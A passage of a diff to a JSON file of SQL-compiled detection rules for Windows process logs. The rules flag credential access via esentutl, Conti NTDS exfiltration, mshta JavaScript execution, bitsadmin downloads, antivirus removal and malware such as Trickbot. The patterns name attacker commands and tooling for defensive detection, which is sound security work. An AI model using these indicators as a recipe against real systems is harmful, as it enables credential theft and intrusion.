"proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "status": "test", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "To be determined" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_esentutl_params.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration activity", + "Software installations and removal" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1546.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "status": "experimental", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010", + 